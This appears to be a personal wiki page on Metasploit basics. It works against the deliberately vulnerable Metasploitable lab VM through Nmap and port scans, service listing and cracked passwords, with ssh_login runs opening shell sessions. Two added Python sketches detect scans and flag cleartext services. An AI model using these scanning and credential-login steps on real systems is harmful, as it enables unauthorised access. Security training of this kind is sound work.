From charlesreid1

Metasploit framework info: http://docs.kali.org/general-use/starting-metasploit-framework-in-kali

Also see Metasploitable for Metasploit in action!

Basics

Fire up metasploit:

$ msfconsole

Get some help:

msf> ?

Use a particular exploit:

msf> use some/particular/exploit

Show info about how to use the exploit:

msf> info 
msf> info some/particular/exploit

Set your variables:

msf> set RHOST 127.0.0.1

Run the exploit:

msf> run

Not-So-Basics

Initializing DB

First, you want postgresql to run as a server:

$ service postgresql start

PostgreSQL is the database that MSF uses.

Now initialize the database:

$ msfdb init

Running

To get a metasploit console, run

$ msfconsole

Capturing Metasploit Console Output

If you want to capture the output you're seeing in Metasploit framework console, you can use the spool command.

spool /root/box/metasploitable/metasploit.log

If the spool command is not available, run the msfupdate command to update Metasploit.

msf > spool /root/box/metasploitable/metasploit.log
[*] Spooling to file /root/box/metasploitable/metasploit.log...
msf > 

To stop recording, set spool to off:

msf > spool off
[*] Spooling is now disable
msf > 

Ninja

How to exploit hosts that aren't available remotely

Suppose you're not a client trying to exploit a server, but are a server trying to exploit a client.

What can you do?

See Metasploit/Exploiting_Clients.

Advanced

Creating Workspace

You can create a workspace to save scan information:

msf > db_status
[*] postgresql connected to msf
msf > workspace
* default
msf > workspace metasploitable
[-] Workspace not found: metasploitable
msf > workspace -a metasploitable
[*] Added workspace: metasploitable
msf > workspace
  default
* metasploitable
msf > workspace -h
Usage:
    workspace                  List workspaces
    workspace [name]           Switch workspace
    workspace -a [name] ...    Add workspace(s)
    workspace -d [name] ...    Delete workspace(s)
    workspace -D               Delete all workspaces
    workspace -r <old> <new>   Rename workspace
    workspace -h               Show this help information

msf >

Reloading Workspace

You can reload a workspace by listing all workspaces, then typing workspace [name]. Here, I reload the metasploitable workspace:

msf > db_status
[*] postgresql connected to msf
msf > workspace
* default
  metasploitable
msf > workspace metasploitable
[*] Workspace: metasploitable
msf >

Nmap Scan Into Workspace

Use db_nmap instead of nmap to store info in database:

msf > db_nmap -A -O -sS -sV 10.0.0.27
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-26 02:54 PDT
[*] Nmap: Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
[*] Nmap: Nmap done: 1 IP address (0 hosts up) scanned in 1.68 seconds
msf > db_nmap -A -O -sS -sV 10.0.0.27
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-26 02:55 PDT
[*] Nmap: Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
[*] Nmap: Nmap done: 1 IP address (0 hosts up) scanned in 1.67 seconds
msf > db_nmap -A -O -sS -sV 10.0.0.27
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-26 02:55 PDT
[*] Nmap: Nmap scan report for 10.0.0.27
[*] Nmap: Host is up (0.0015s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT     STATE SERVICE     VERSION
[*] Nmap: 21/tcp   open  ftp         vsftpd 2.3.4
[*] Nmap: |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
[*] Nmap: 22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: | ssh-hostkey:
[*] Nmap: |   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
[*] Nmap: |_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
[*] Nmap: 23/tcp   open  telnet      Linux telnetd
[*] Nmap: 25/tcp   open  smtp        Postfix smtpd
[*] Nmap: |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
[*] Nmap: | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
[*] Nmap: | Not valid before: 2010-03-17T14:07:45
[*] Nmap: |_Not valid after:  2010-04-16T14:07:45
[*] Nmap: |_ssl-date: 2016-03-25T23:42:57+00:00; -10h12m30s from scanner time.
[*] Nmap: 53/tcp   open  domain      ISC BIND 9.4.2
[*] Nmap: | dns-nsid:
[*] Nmap: |_  bind.version: 9.4.2
[*] Nmap: 80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
[*] Nmap: |_http-title: Metasploitable2 - Linux
[*] Nmap: 111/tcp  open  rpcbind     2 (RPC #100000)
[*] Nmap: | rpcinfo:
[*] Nmap: |   program version   port/proto  service
[*] Nmap: |   100000  2            111/tcp  rpcbind
[*] Nmap: |   100000  2            111/udp  rpcbind
[*] Nmap: |   100003  2,3,4       2049/tcp  nfs
[*] Nmap: |   100003  2,3,4       2049/udp  nfs
[*] Nmap: |   100005  1,2,3      42714/tcp  mountd
[*] Nmap: |   100005  1,2,3      46675/udp  mountd
[*] Nmap: |   100021  1,3,4      33001/tcp  nlockmgr
[*] Nmap: |   100021  1,3,4      58755/udp  nlockmgr
[*] Nmap: |   100024  1          35518/udp  status
[*] Nmap: |_  100024  1          46140/tcp  status
[*] Nmap: 139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 512/tcp  open  exec        netkit-rsh rexecd
[*] Nmap: 513/tcp  open  login?
[*] Nmap: 514/tcp  open  tcpwrapped
[*] Nmap: 1099/tcp open  java-rmi    Java RMI Registry
[*] Nmap: 1524/tcp open  shell       Metasploitable root shell
[*] Nmap: 2049/tcp open  nfs         2-4 (RPC #100003)
[*] Nmap: 2121/tcp open  ftp         ProFTPD 1.3.1
[*] Nmap: 3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
[*] Nmap: | mysql-info:
[*] Nmap: |   Protocol: 53
[*] Nmap: |   Version: .0.51a-3ubuntu5
[*] Nmap: |   Thread ID: 10
[*] Nmap: |   Capabilities flags: 43564
[*] Nmap: |   Some Capabilities: Speaks41ProtocolNew, Support41Auth, SupportsTransactions, SwitchToSSLAfterHandshake, LongColumnFlag, SupportsCompression, ConnectWithDatabase
[*] Nmap: |   Status: Autocommit
[*] Nmap: |_  Salt: [k*.G\v`^63:h~cRR'eM
[*] Nmap: 5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
[*] Nmap: 5900/tcp open  vnc         VNC (protocol 3.3)
[*] Nmap: | vnc-info:
[*] Nmap: |   Protocol version: 3.3
[*] Nmap: |   Security types:
[*] Nmap: |_    Unknown security type (33554432)
[*] Nmap: 6000/tcp open  X11         (access denied)
[*] Nmap: 6667/tcp open  irc         Unreal ircd
[*] Nmap: 8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
[*] Nmap: |_ajp-methods: Failed to get a valid response for the OPTION request
[*] Nmap: 8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
[*] Nmap: |_http-favicon: Apache Tomcat
[*] Nmap: |_http-server-header: Apache-Coyote/1.1
[*] Nmap: |_http-title: Apache Tomcat/5.5
[*] Nmap: MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 2.6.X
[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:2.6
[*] Nmap: OS details: Linux 2.6.9 - 2.6.33
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Host script results:
[*] Nmap: |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
[*] Nmap: | smb-os-discovery:
[*] Nmap: |   OS: Unix (Samba 3.0.20-Debian)
[*] Nmap: |   NetBIOS computer name:
[*] Nmap: |   Workgroup: WORKGROUP
[*] Nmap: |_  System time: 2016-03-25T19:42:53-04:00
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT     ADDRESS
[*] Nmap: 1   1.47 ms 10.0.0.27
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 78.16 seconds

This information will be imported and parsed accordingly:

msf > hosts

Hosts
=====

address    mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---                ----  -------  ---------  -----  -------  ----  --------
10.0.0.27  08:00:27:47:98:ad        Linux               2.6.X  server

msf >

Back Up Workspace

To back up a workspace, use db_export:

msf > db_export -h
Usage:
    db_export -f <format> [filename]
    Format can be one of: xml, pwdump
[-] No output file was specified
msf > db_export -f xml /root/metasploitable.xml
[*] Starting export of workspace metasploitable to /root/metasploitable.xml [ xml ]...
[*]     >> Starting export of report
[*]     >> Starting export of hosts
[*]     >> Starting export of events
[*]     >> Starting export of services
[*]     >> Starting export of web sites
[*]     >> Starting export of web pages
[*]     >> Starting export of web forms
[*]     >> Starting export of web vulns
[*]     >> Starting export of module details
[*]     >> Finished export of report
[*] Finished export of workspace metasploitable to /root/metasploitable.xml [ xml ]...
msf >

Dealing With Hosts

The interface for using the hosts information is very powerful. We can use the -c switch to control what columns are shown:

msf > hosts -c address,os_name

Hosts
=====

address    os_name
-------    -------
10.0.0.27  Linux

msf >

We can also narrow down results (if we have a large number of hosts on a network) by searching for strings:

msf > hosts -c address,os_name -S linux

Hosts
=====

address    os_name
-------    -------
10.0.0.27  Linux

msf >

Passing Hosts to RHOST

If we have loaded a module, like auxiliary/scanner/portscan/tcp, we can add the -R flag to a hosts search to set RHOSTS from the matching hosts. (This can add multiple remote hosts to a scan, which is handy for long lists of hosts.)

The output of each scan and each module that is run is also added to the database. Running a TCP scan will identify open ports, and each of those open ports will be added to the workspace in the Metasploit database.

msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target address range or CIDR identifier
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf auxiliary(tcp) > hosts -c address,os_name -S linux -R

Hosts
=====

address    os_name
-------    -------
10.0.0.27  Linux

RHOSTS => 10.0.0.27

msf auxiliary(tcp) > run

[*] 10.0.0.27:22 - TCP OPEN
[*] 10.0.0.27:23 - TCP OPEN
[*] 10.0.0.27:21 - TCP OPEN
[*] 10.0.0.27:25 - TCP OPEN
[*] 10.0.0.27:53 - TCP OPEN
[*] 10.0.0.27:80 - TCP OPEN
[*] 10.0.0.27:111 - TCP OPEN
[*] 10.0.0.27:139 - TCP OPEN
[*] 10.0.0.27:445 - TCP OPEN
[*] 10.0.0.27:514 - TCP OPEN
[*] 10.0.0.27:513 - TCP OPEN
[*] 10.0.0.27:512 - TCP OPEN
[*] 10.0.0.27:1099 - TCP OPEN
[*] 10.0.0.27:1524 - TCP OPEN
[*] 10.0.0.27:2049 - TCP OPEN
[*] 10.0.0.27:2121 - TCP OPEN
[*] 10.0.0.27:3306 - TCP OPEN
[*] 10.0.0.27:3632 - TCP OPEN
[*] 10.0.0.27:5432 - TCP OPEN
[*] 10.0.0.27:5900 - TCP OPEN
[*] 10.0.0.27:6000 - TCP OPEN
[*] 10.0.0.27:6667 - TCP OPEN
[*] 10.0.0.27:6697 - TCP OPEN
[*] 10.0.0.27:8009 - TCP OPEN
[*] 10.0.0.27:8180 - TCP OPEN
[*] 10.0.0.27:8787 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >

This process will create a deluge of packet traffic between the attacker (morpheus) and the target (metasploitable, 10.0.0.27), as shown by tcpdump:

# tcpdump -i eth0

[...]

03:35:33.494539 IP morpheus.38946 > 10.0.0.27.7745: Flags [S], seq 4229817845, win 29200, options [mss 1460,sackOK,TS val 67880356 ecr 0,nop,wscale 10], length 0
03:35:33.494905 IP morpheus.56392 > 10.0.0.27.7746: Flags [S], seq 2209661380, win 29200, options [mss 1460,sackOK,TS val 67880356 ecr 0,nop,wscale 10], length 0
03:35:33.494955 IP 10.0.0.27.7745 > morpheus.38946: Flags [R.], seq 0, ack 4229817846, win 0, length 0
03:35:33.495132 IP 10.0.0.27.7746 > morpheus.56392: Flags [R.], seq 0, ack 2209661381, win 0, length 0
03:35:33.495282 IP morpheus.44735 > 10.0.0.27.7747: Flags [S], seq 1306640419, win 29200, options [mss 1460,sackOK,TS val 67880356 ecr 0,nop,wscale 10], length 0
03:35:33.496069 IP 10.0.0.27.7747 > morpheus.44735: Flags [R.], seq 0, ack 1306640420, win 0, length 0
03:35:33.496090 IP morpheus.42604 > 10.0.0.27.7749: Flags [S], seq 1345082972, win 29200, options [mss 1460,sackOK,TS val 67880356 ecr 0,nop,wscale 10], length 0
03:35:33.496357 IP 10.0.0.27.7749 > morpheus.42604: Flags [R.], seq 0, ack 1345082973, win 0, length 0
03:35:33.708617 IP6 2601:602:8901:d335:bcd1:65ff:fe92:6371.48457 > ff05::c.1900: UDP, length 98
03:35:33.816292 IP6 2601:602:8901:d335:bcd1:65ff:fe92:6371.48457 > ff05::c.1900: UDP, length 98
03:35:33.833652 IP morpheus.46610 > 10.0.0.27.7753: Flags [S], seq 2211519157, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0
03:35:33.834214 IP morpheus.52147 > 10.0.0.27.7751: Flags [S], seq 2171151102, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0
03:35:33.834335 IP 10.0.0.27.7753 > morpheus.46610: Flags [R.], seq 0, ack 2211519158, win 0, length 0
03:35:33.834502 IP 10.0.0.27.7751 > morpheus.52147: Flags [R.], seq 0, ack 2171151103, win 0, length 0
03:35:33.834831 IP morpheus.43955 > 10.0.0.27.7752: Flags [S], seq 1337658889, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0
03:35:33.835315 IP 10.0.0.27.7752 > morpheus.43955: Flags [R.], seq 0, ack 1337658890, win 0, length 0
03:35:33.835404 IP morpheus.48124 > 10.0.0.27.7755: Flags [S], seq 2750644096, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0
03:35:33.835964 IP morpheus.41084 > 10.0.0.27.7756: Flags [S], seq 2965282008, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0
03:35:33.836016 IP 10.0.0.27.7755 > morpheus.48124: Flags [R.], seq 0, ack 2750644097, win 0, length 0
03:35:33.836268 IP 10.0.0.27.7756 > morpheus.41084: Flags [R.], seq 0, ack 2965282009, win 0, length 0
03:35:33.836544 IP morpheus.53623 > 10.0.0.27.7757: Flags [S], seq 1989216855, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0
03:35:33.836835 IP 10.0.0.27.7757 > morpheus.53623: Flags [R.], seq 0, ack 1989216856, win 0, length 0
03:35:33.837113 IP morpheus.34173 > 10.0.0.27.7758: Flags [S], seq 462052512, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0
03:35:33.837454 IP 10.0.0.27.7758 > morpheus.34173: Flags [R.], seq 0, ack 462052513, win 0, length 0
03:35:33.837707 IP morpheus.39847 > 10.0.0.27.7759: Flags [S], seq 4103494796, win 29200, options [mss 1460,sackOK,TS val 67880442 ecr 0,nop,wscale 10], length 0
03:35:33.837976 IP 10.0.0.27.7759 > morpheus.39847: Flags [R.], seq 0, ack 4103494797, win 0, length 0
03:35:33.838475 IP morpheus.51488 > 10.0.0.27.7760: Flags [S], seq 3689956999, win 29200, options [mss 1460,sackOK,TS val 67880442 ecr 0,nop,wscale 10], length 0
03:35:33.838757 IP 10.0.0.27.7760 > morpheus.51488: Flags [R.], seq 0, ack 3689957000, win 0, length 0
03:35:33.840901 IP morpheus.37018 > 10.0.0.27.7754: Flags [S], seq 2708295021, win 29200, options [mss 1460,sackOK,TS val 67880442 ecr 0,nop,wscale 10], length 0
03:35:33.841397 IP 10.0.0.27.7754 > morpheus.37018: Flags [R.], seq 0, ack 2708295022, win 0, length 0
03:35:33.926962 IP6 fe80::bcd1:65ff:fe92:6371.48457 > ff02::c.1900: UDP, length 98
03:35:34.034038 IP6 fe80::bcd1:65ff:fe92:6371.48457 > ff02::c.1900: UDP, length 98
03:35:34.149946 IP 10.0.0.1.55203 > 239.255.255.250.1900: UDP, length 104
03:35:34.166687 IP morpheus.59867 > 10.0.0.27.7763: Flags [S], seq 3464606117, win 29200, options [mss 1460,sackOK,TS val 67880524 ecr 0,nop,wscale 10], length 0
03:35:34.167308 IP 10.0.0.27.7763 > morpheus.59867: Flags [R.], seq 0, ack 3464606118, win 0, length 0
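
Seen from the target's side, the capture above has a recognizable shape: one source sends bare SYNs to many different ports in a short time, and most are answered with RST. The following detection sketch is an added example, not part of the original page; the thresholds, the function names and the 10.0.0.9 client in the sample are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in tcpdump's default text format, trimmed from the capture
# above; the 10.0.0.9 web client is made up to show a host that is not scanning.
SAMPLE_CAPTURE = """\
03:35:33.494539 IP morpheus.38946 > 10.0.0.27.7745: Flags [S], seq 4229817845, win 29200, length 0
03:35:33.494905 IP morpheus.56392 > 10.0.0.27.7746: Flags [S], seq 2209661380, win 29200, length 0
03:35:33.494955 IP 10.0.0.27.7745 > morpheus.38946: Flags [R.], seq 0, ack 4229817846, win 0, length 0
03:35:33.495132 IP 10.0.0.27.7746 > morpheus.56392: Flags [R.], seq 0, ack 2209661381, win 0, length 0
03:35:33.495282 IP morpheus.44735 > 10.0.0.27.7747: Flags [S], seq 1306640419, win 29200, length 0
03:35:33.496069 IP 10.0.0.27.7747 > morpheus.44735: Flags [R.], seq 0, ack 1306640420, win 0, length 0
03:35:33.496090 IP morpheus.42604 > 10.0.0.27.7749: Flags [S], seq 1345082972, win 29200, length 0
03:35:33.496357 IP 10.0.0.27.7749 > morpheus.42604: Flags [R.], seq 0, ack 1345082973, win 0, length 0
03:35:33.708617 IP6 fe80::bcd1:65ff:fe92:6371.48457 > ff02::c.1900: UDP, length 98
03:35:33.833652 IP morpheus.46610 > 10.0.0.27.7753: Flags [S], seq 2211519157, win 29200, length 0
03:35:33.834335 IP 10.0.0.27.7753 > morpheus.46610: Flags [R.], seq 0, ack 2211519158, win 0, length 0
03:35:34.100000 IP 10.0.0.9.51000 > 10.0.0.27.80: Flags [S], seq 1000, win 29200, length 0
03:35:34.100400 IP 10.0.0.27.80 > 10.0.0.9.51000: Flags [S.], seq 2000, ack 1001, win 5792, length 0
03:35:34.300000 IP 10.0.0.9.51001 > 10.0.0.27.80: Flags [S], seq 3000, win 29200, length 0
"""

# IPv4 TCP lines only: "HH:MM:SS.frac IP src.sport > dst.dport: Flags [..]".
# The last dot-separated field of each endpoint is the port, so this works for
# resolved names (morpheus) and dotted addresses alike. IP6/UDP lines do not match.
PKT = re.compile(
    r"^(\d\d):(\d\d):(\d\d\.\d+) IP (\S+)\.(\d+) > (\S+)\.(\d+): Flags \[([^\]]+)\]"
)


def parse(line):
    """Return (seconds_since_midnight, src, sport, dst, dport, flags) or None."""
    m = PKT.match(line)
    if not m:
        return None
    hh, mm, ss, src, sport, dst, dport, flags = m.groups()
    ts = int(hh) * 3600 + int(mm) * 60 + float(ss)
    return ts, src, int(sport), dst, int(dport), flags


def find_scanners(lines, min_ports=5, window=2.0):
    """Flag (src, dst) pairs where src SYNs >= min_ports distinct ports on dst
    within `window` seconds. Captures spanning midnight are not handled."""
    syns = defaultdict(list)    # (src, dst) -> [(ts, probed port)]
    resets = defaultdict(set)   # (src, dst) -> probed ports that answered RST
    for line in lines:
        pkt = parse(line)
        if pkt is None:
            continue
        ts, src, sport, dst, dport, flags = pkt
        if flags == "S":                      # bare SYN: a connection attempt
            syns[(src, dst)].append((ts, dport))
        elif "R" in flags:                    # RST goes target -> prober, so the
            resets[(dst, src)].add(sport)     # RST's source port is the probed port
    findings = []
    for (src, dst), probes in syns.items():
        probes.sort()
        best, start = set(), 0
        for end in range(len(probes)):
            while probes[end][0] - probes[start][0] > window:
                start += 1
            ports = {port for _, port in probes[start:end + 1]}
            if len(ports) > len(best):
                best = ports
        if len(best) >= min_ports:
            findings.append({
                "src": src,
                "dst": dst,
                "ports": sorted(best),
                "closed": len(best & resets[(src, dst)]),
            })
    return findings


if __name__ == "__main__":
    for hit in find_scanners(SAMPLE_CAPTURE.splitlines()):
        print(f"{hit['src']} probed {len(hit['ports'])} ports on {hit['dst']}, "
              f"{hit['closed']} answered RST")
```
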

Services

Once we have done an Nmap and TCP scan, we know what services are running and what ports are open.

Show the services that are up with services -u:

msf auxiliary(tcp) > services -u

Services
========

host       port  proto  name         state  info
----       ----  -----  ----         -----  ----
10.0.0.27  21    tcp    ftp          open   vsftpd 2.3.4
10.0.0.27  22    tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
10.0.0.27  23    tcp    telnet       open   Linux telnetd
10.0.0.27  25    tcp    smtp         open   Postfix smtpd
10.0.0.27  53    tcp    domain       open   ISC BIND 9.4.2
10.0.0.27  80    tcp    http         open   Apache httpd 2.2.8 (Ubuntu) DAV/2
10.0.0.27  111   tcp    rpcbind      open   2 RPC #100000
10.0.0.27  139   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
10.0.0.27  445   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
10.0.0.27  512   tcp    exec         open   netkit-rsh rexecd
10.0.0.27  513   tcp    login        open
10.0.0.27  514   tcp    tcpwrapped   open
10.0.0.27  1099  tcp    java-rmi     open   Java RMI Registry
10.0.0.27  1524  tcp    shell        open   Metasploitable root shell
10.0.0.27  2049  tcp    nfs          open   2-4 RPC #100003
10.0.0.27  2121  tcp    ftp          open   ProFTPD 1.3.1
10.0.0.27  3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5
10.0.0.27  3632  tcp                 open
10.0.0.27  5432  tcp    postgresql   open   PostgreSQL DB 8.3.0 - 8.3.7
10.0.0.27  5900  tcp    vnc          open   VNC protocol 3.3
10.0.0.27  6000  tcp    x11          open   access denied
10.0.0.27  6667  tcp    irc          open   Unreal ircd
10.0.0.27  6697  tcp                 open
10.0.0.27  8009  tcp    ajp13        open   Apache Jserv Protocol v1.3
10.0.0.27  8180  tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1
10.0.0.27  8787  tcp                 open

msf auxiliary(tcp) >
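
When the console is spooled to a log file, the services table can be turned back into structured records for an exposure review. The sketch below is an added example, not part of the original page or of Metasploit. It assumes the table keeps the space-padded layout shown above, and the function names and the short review policy are hypothetical. Column boundaries are taken from the dashed rule line, because splitting on whitespace misreads rows whose name column is empty (such as port 3632).

```python
import re

# Sample input: rows copied from the services table above, as they would
# appear in a spooled msfconsole log.
SAMPLE_SPOOL = """\
msf auxiliary(tcp) > services -u

Services
========

host       port  proto  name         state  info
----       ----  -----  ----         -----  ----
10.0.0.27  21    tcp    ftp          open   vsftpd 2.3.4
10.0.0.27  22    tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
10.0.0.27  23    tcp    telnet       open   Linux telnetd
10.0.0.27  512   tcp    exec         open   netkit-rsh rexecd
10.0.0.27  3632  tcp                 open
10.0.0.27  8180  tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1

msf auxiliary(tcp) >
"""

# Hypothetical review policy: service names that carry logins in cleartext.
CLEARTEXT = {
    "ftp": "cleartext file transfer",
    "telnet": "cleartext remote login",
    "exec": "cleartext r-service",
    "login": "cleartext r-service",
    "shell": "cleartext r-service",
}


def parse_msf_table(text, title):
    """Return the rows of the table headed `title` as a list of dicts."""
    lines = text.splitlines()
    for i, line in enumerate(lines):
        underlined = i + 1 < len(lines) and set(lines[i + 1].strip()) == {"="}
        if line.strip() == title and underlined:
            break
    else:
        return []                      # no such table in this log
    j = i + 2
    while j < len(lines) and not lines[j].strip():
        j += 1                         # skip the blank line after the title
    if j + 1 >= len(lines):
        return []
    header, rule = lines[j], lines[j + 1]
    # Each run of dashes in the rule marks where a column starts.
    starts = [m.start() for m in re.finditer(r"-+", rule)]
    ends = starts[1:] + [None]         # last column runs to end of line
    names = [header[s:e].strip() for s, e in zip(starts, ends)]
    rows = []
    for line in lines[j + 2:]:
        if not line.strip():
            break                      # a blank line ends the table
        rows.append({n: line[s:e].strip() for n, s, e in zip(names, starts, ends)})
    return rows


def review_services(rows):
    """Return (port, reason) for open services worth a closer look."""
    findings = []
    for row in rows:
        if row["state"] != "open":
            continue
        port = int(row["port"])
        if not row["name"]:
            findings.append((port, "unidentified service"))
        elif row["name"] in CLEARTEXT:
            findings.append((port, CLEARTEXT[row["name"]]))
    return findings


if __name__ == "__main__":
    for port, reason in review_services(parse_msf_table(SAMPLE_SPOOL, "Services")):
        print(f"{port}/tcp: {reason}")
```
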

Credentials

Like services, credentials are also accrued in the database.

msf > creds

Credentials
===========

host  port  user  pass  type  active?
----  ----  ----  ----  ----  -------

[*] Found 0 credentials.

Once you find credentials, you can add them manually. We found credentials for 6 out of 7 users with John the Ripper (see Metasploitable/John Shadow File):

password         (username)
-----------------------------------
postgres         (postgres)
user             (user)
msfadmin         (msfadmin)
service          (service)
batman           (sys)
123456789        (klog)

Add them by using the ssh_login module:

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options
msf auxiliary(ssh_login) > set RHOSTS 10.0.0.27
RHOSTS => 10.0.0.27
msf auxiliary(ssh_login) > set USERNAME msfadmin
USERNAME => msfadmin
msf auxiliary(ssh_login) > set PASSWORD msfadmin
PASSWORD => msfadmin
msf auxiliary(ssh_login) > run

[*] 10.0.0.27:22 SSH - Starting bruteforce
[+] 10.0.0.27:22 SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 1 opened (10.0.0.5:45812 -> 10.0.0.27:22) at 2016-03-26 17:23:11 -0700
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) >

More Credentials

Run each of the other credentials we found. Everything goes OK up until the last one, username klog:

msf auxiliary(ssh_login) > set USERNAME user
USERNAME => user
msf auxiliary(ssh_login) > set PASSWORD user
PASSWORD => user
msf auxiliary(ssh_login) > run

[*] 10.0.0.27:22 SSH - Starting bruteforce
[+] 10.0.0.27:22 SSH - Success: 'user:user' 'uid=1001(user) gid=1001(user) groups=1001(user) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 2 opened (10.0.0.5:50289 -> 10.0.0.27:22) at 2016-03-26 17:25:16 -0700
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set USERNAME postgres
USERNAME => postgres
msf auxiliary(ssh_login) > set PASSWORD postgres
PASSWORD => postgres
msf auxiliary(ssh_login) > run

[*] 10.0.0.27:22 SSH - Starting bruteforce
[+] 10.0.0.27:22 SSH - Success: 'postgres:postgres' 'uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 3 opened (10.0.0.5:57606 -> 10.0.0.27:22) at 2016-03-26 17:25:25 -0700
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set USERNAME service
USERNAME => service
msf auxiliary(ssh_login) > set PASSWORD service
PASSWORD => service
msf auxiliary(ssh_login) > run

[*] 10.0.0.27:22 SSH - Starting bruteforce
[+] 10.0.0.27:22 SSH - Success: 'service:service' 'uid=1002(service) gid=1002(service) groups=1002(service) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 4 opened (10.0.0.5:52395 -> 10.0.0.27:22) at 2016-03-26 17:25:36 -0700
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set USERNAME sys
USERNAME => sys
msf auxiliary(ssh_login) > set PASSWORD batman
PASSWORD => batman
msf auxiliary(ssh_login) > run

[*] 10.0.0.27:22 SSH - Starting bruteforce
[+] 10.0.0.27:22 SSH - Success: 'sys:batman' 'uid=3(sys) gid=3(sys) groups=3(sys) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 5 opened (10.0.0.5:34297 -> 10.0.0.27:22) at 2016-03-26 17:25:56 -0700
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set USERNAME klog
USERNAME => klog
msf auxiliary(ssh_login) > set PASSWORD 123456789
PASSWORD => 123456789
msf auxiliary(ssh_login) > run

[*] 10.0.0.27:22 SSH - Starting bruteforce
[+] 10.0.0.27:22 SSH - Success: 'klog:123456789' 'Could not chdir to home directory /home/klog: No such file or directory Could not chdir to home directory /home/klog: No such file or directory '
